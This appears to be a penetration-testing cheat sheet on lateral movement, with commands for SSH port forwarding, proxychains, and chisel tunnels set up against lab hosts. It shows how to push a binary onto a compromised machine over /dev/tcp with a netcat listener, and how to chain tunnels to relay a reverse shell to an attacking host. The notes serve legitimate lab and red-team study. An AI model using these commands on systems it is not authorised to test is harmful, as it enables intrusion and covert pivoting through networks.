Lateral Movement
SSH Tunneling
Dynamic Port Forwarding
Check proxychains port
tail /etc/proxychains.confCreate a SOCK proxy
ssh charix@10.10.10.84 -D 9050Now just use proxychains:
proxychains vncviewer 127.0.0.1:5901 -passwd secretLocal Port Forwarding
ssh -L PORT:localhost:PORT user@remotehost.comWithout interactive session
ssh -L 8080:127.0.0.1:8080 -N -vv User@REemoteHostRemote Port Forwarding
ssh root@10.10.10.65 -R 4443:10.10.14.6:443chisel
Install chisel
curl https://i.jpillora.com/chisel! | bashTransfer chisel to a target
Copy the binary
cp /usr/local/bin/chisel .Set netcat
nc -lvnp 80 < chiselNow on the remote host
cd /var/tmpcat < /dev/tcp/10.10.14.172/80 > chisel
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"chmod 755 /var/tmp/chiselCreate a tunnel
Start the server locally
/usr/local/bin/chisel server -p 8002 -reverse -vStart the tunnel remotely
/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80Multihop tunnel for reverse shell
First start the new server on your attacking host:
/usr/local/bin/chisel server -p 5000 -reverse -vSet also the listener:
nc -lvnp 9005Now set the first hop:
/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000Finally set the second hop:
/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &Change a route's metric
sudo route change -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.1.254 metric 200Last updated